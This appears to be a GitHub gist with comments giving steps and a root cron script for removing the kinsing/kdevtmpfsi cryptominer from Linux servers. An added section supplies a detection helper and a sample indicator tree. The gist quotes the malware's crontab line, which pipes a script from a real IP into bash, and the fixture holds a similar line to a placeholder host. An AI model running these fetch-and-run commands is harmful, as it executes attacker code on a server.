@ArrayIterator
Last active November 1, 2024 06:20
Kill the kinsing & kdevtmpfsi malware

Kinsing File Affected

Many of the fixes posted on the internet do not fully resolve a kinsing infection. The kinsing malware also spreads over the network and listens on a network port.

Check All SSH Authorization

Check the root user's SSH authorized keys:

cat ~/.ssh/authorized_keys

Look for keys you did not authorize (and remove them if found). It is optional but recommended to check the authorized keys of every other user as well.

Check user under the group

Look for users you do not recognise, and check whether any user's home directory is outside the usual /home/ (system users excepted):

getent passwd | cut -d : -f 1 | xargs groups

Check the php.ini (.ini files by php)

Check that auto_prepend_file is empty (or points only to a trusted file):

grep -rnw 'auto_prepend_file' --include='*.ini' /

Edit the crontab

Do not delete the wget or curl line that kinsing added to the crontab; just comment it out, as in the example below. The malware's scripts check the crontab file for that line.

# your another crontab
# * * * * * curl http://185.122.204.197/cp.sh | bash > /dev/null 2>&1

You can also set the immutable attribute so the crontab file cannot be changed (it may still be changed while kinsing is running; this was only tested briefly):

chattr +i /var/spool/cron/crontabs/root   # Debian/Ubuntu path; on RHEL-based systems the file is /var/spool/cron/root

Kill all processes

Create a bash script that kills kinsing, placed under the root home directory (any file name will do, e.g. /root/killer-kin.sh).

Make sure net-tools (which provides netstat) is installed, then put the following cron entry into /etc/cron.d/killer-kin:

MAILTO=''
# KILLER
* * * * * root /bin/bash /root/killer-kin.sh

The /root/killer-kin.sh script (make it executable with chmod +x):

#!/bin/bash
# Runs as root from /etc/cron.d every minute; needs net-tools (netstat).

# ALSO TEST THE SSH STATUS (match the daemon name exactly, so ssh clients or ssh-agent do not count)
if [[ -z "$(pgrep -x sshd)" ]]; then
        echo "SSH STOPPED! STARTING"
        /usr/bin/systemctl start ssh
else
        echo "SSH RUNNING"
fi

# DELETE PRELOAD LD LIBRARY (clear the immutable attribute in case it was set, then truncate the file)
chattr -i /etc/ld.so.preload 2>/dev/null
: > /etc/ld.so.preload

# BOT SERVICE IS KINSING SERVICE
/usr/bin/systemctl stop bot.service &>/dev/null
/usr/bin/systemctl disable bot.service &>/dev/null

# DELETE BOT SERVICE
: > /lib/systemd/system/bot.service

# KILL THE KINSING FROM NETWORK
# netstat -p prints "PID/Program name" in the last column; there may be more than one listener,
# so walk every matching PID instead of assuming a single one.
kill_listeners() {
        local name="$1" pid
        for pid in $(netstat -tlnp 2>/dev/null | awk -v n="$name" '$NF ~ n {split($NF,a,"/"); print a[1]}' | sort -u); do
                if [[ $pid =~ ^[0-9]+$ ]]; then
                        echo "${name^^} FOUND IN NETWORK -> ${pid}"
                        kill -9 "$pid"   # SIGKILL cannot be caught or ignored
                fi
        done
}
kill_listeners kinsing
kill_listeners kdevtmpfsi

# KILL THE KINSING PROCESS (same name patterns as above; SIGKILL so the process cannot ignore it)
if pgrep kdevtmpfsi >/dev/null; then
        echo "MALWARE KDEV FOUND"
        pkill -9 kdevtmpfsi
fi
if pgrep kinsing >/dev/null; then
        echo "MALWARE KIN FOUND"
        pkill -9 kinsing
fi

# REMOVE KINSING FROM TMP & DATA DIRECTORY
echo "DELETING KIN"
rm -f /tmp/kdevtmpfsi* /tmp/kinsing* /var/tmp/kinsing* /var/tmp/kdevtmpfsi* /etc/data/kinsing /etc/data/libsystem.so

# LAST ... FIND KINSING IN ANY DIRECTORY
# BUT THIS IS TOO EXPENSIVE TO RUN EVERY MINUTE, SO IT IS LEFT COMMENTED OUT
#find / -iname 'kdevtmpfsi*' -exec rm -fv {} \;
#find / -iname 'kinsing*' -exec rm -fv {} \;

KINSING file definitions

Check whether /etc/ld.so.preload contains /etc/data/libsystem.so; the kinsing executable is commonly found at /etc/data/kinsing.

  1. Kinsing executable file: /etc/data/kinsing
  2. Kinsing library file: /etc/data/libsystem.so or /dev/shm/libsystem.so
  3. Kinsing disables the NMI watchdog by appending nmi_watchdog=0 to /etc/sysctl.conf
  4. Temporarily downloaded kinsing files matching the regex (/var)?/tmp/kinsing[0-9]+? or (/var)?/tmp/kdevtmpfsi[0-9]+?
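As an added example (not part of the original gist), a bash helper that checks a filesystem root for the indicators listed above plus the crontab and auto_prepend_file checks from the earlier sections; the ROOT argument, the sample tree and its php.ini path are assumptions, and the C2 host in the sample is a placeholder.

```shell
# Added triage helper, not from the gist: prints one line per kinsing indicator
# found under ROOT (default /), so it can also run against a mounted image.
kinsing_indicators() {
    local root="${1:-/}" f d
    # 1. /etc/ld.so.preload forcing the kinsing library into every new process
    if grep -qs 'libsystem\.so' "$root/etc/ld.so.preload"; then
        echo "ld.so.preload references libsystem.so"
    fi
    # 2. dropped executable and library at the locations named above
    for f in etc/data/kinsing etc/data/libsystem.so dev/shm/libsystem.so; do
        if [ -e "$root/$f" ]; then echo "file present: /$f"; fi
    done
    # 3. NMI watchdog disabled through sysctl.conf
    if grep -qsE '^[[:space:]]*(kernel\.)?nmi_watchdog[[:space:]]*=[[:space:]]*0' \
            "$root/etc/sysctl.conf"; then
        echo "nmi_watchdog=0 in sysctl.conf"
    fi
    # 4. temporary downloads: (/var)?/tmp/kinsing[0-9]* and (/var)?/tmp/kdevtmpfsi[0-9]*
    for d in tmp var/tmp; do
        for f in "$root/$d"/kinsing* "$root/$d"/kdevtmpfsi*; do
            if [ -e "$f" ]; then echo "temp file: ${f#"$root"}"; fi
        done
    done
    # 5. an active (not commented-out) crontab line piping curl/wget output into a shell
    if grep -qsE '^[^#]*(curl|wget)[^#|]*\|[[:space:]]*(ba)?sh' \
            "$root"/var/spool/cron/crontabs/* "$root"/var/spool/cron/* 2>/dev/null; then
        echo "crontab pipes curl/wget into a shell"
    fi
    # 6. auto_prepend_file set to a path in any PHP .ini under /etc
    if grep -rqsE '^[[:space:]]*auto_prepend_file[[:space:]]*=[[:space:]]*[^[:space:];]' \
            --include='*.ini' "$root/etc" 2>/dev/null; then
        echo "auto_prepend_file is set in a PHP .ini"
    fi
}

# Constructed sample tree reproducing the indicators (test data, not a real host;
# the C2 host is a placeholder and the php.ini location is assumed).
make_sample_tree() {
    local root="$1"
    mkdir -p "$root/etc/data" "$root/tmp" "$root/var/tmp" \
        "$root/var/spool/cron/crontabs" "$root/etc/php/8.1/fpm"
    echo '/etc/data/libsystem.so' > "$root/etc/ld.so.preload"
    : > "$root/etc/data/kinsing"; : > "$root/etc/data/libsystem.so"
    printf 'net.ipv4.ip_forward=1\nnmi_watchdog=0\n' > "$root/etc/sysctl.conf"
    : > "$root/tmp/kdevtmpfsi1"; : > "$root/var/tmp/kinsing"
    echo '* * * * * curl http://c2.invalid/cp.sh | bash > /dev/null 2>&1' \
        > "$root/var/spool/cron/crontabs/root"
    echo 'auto_prepend_file = /tmp/kdevtmpfsi1' > "$root/etc/php/8.1/fpm/php.ini"
}
```

Running `kinsing_indicators` with no argument scans the live system; a commented-out crontab line (as the gist recommends) is deliberately not reported.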

Limit the files

  1. Edit /etc/sysctl.conf, add the settings you need, then run: chattr +i /etc/sysctl.conf
  2. Create empty placeholder files with echo '' > /tmp/kinsing; echo '' > /tmp/kdevtmpfsi, then run chattr +i /tmp/kinsing /tmp/kdevtmpfsi
  3. Overwrite kinsing and libsystem.so with echo '' > /etc/data/kinsing; echo '' > /etc/data/libsystem.so, then run chattr +i /etc/data/kinsing /etc/data/libsystem.so

NOTE

A clean install or full reinstall of the server is recommended.


doonfrs commented Oct 31, 2024

Great, but after that you manually need to check the following:
1 - no users under the root group (other than the root user)
2 - check all ssh authorizations
3 - check php pre-load in php.ini

I prefer that you manually check the steps; I wrote a Reddit post for that.
https://www.reddit.com/r/cyberpanel/comments/1gfw7fl/steps_to_remove_malware_from_ubuntu_server_after/


ArrayIterator commented Nov 1, 2024

Great, but after that you manually need to check the following: 1 - no users under the root group (other than the root user) 2 - check all ssh authorizations 3 - check php pre-load in php.ini

I prefer that you manually check the steps; I wrote a Reddit post for that. https://www.reddit.com/r/cyberpanel/comments/1gfw7fl/steps_to_remove_malware_from_ubuntu_server_after/

Yes ...
Checking users by group:

getent passwd | cut -d : -f 1 | xargs groups

In some cases the user that kinsing uses is a zero-day that can get into the sudo group.

Thanks, the file is updated.
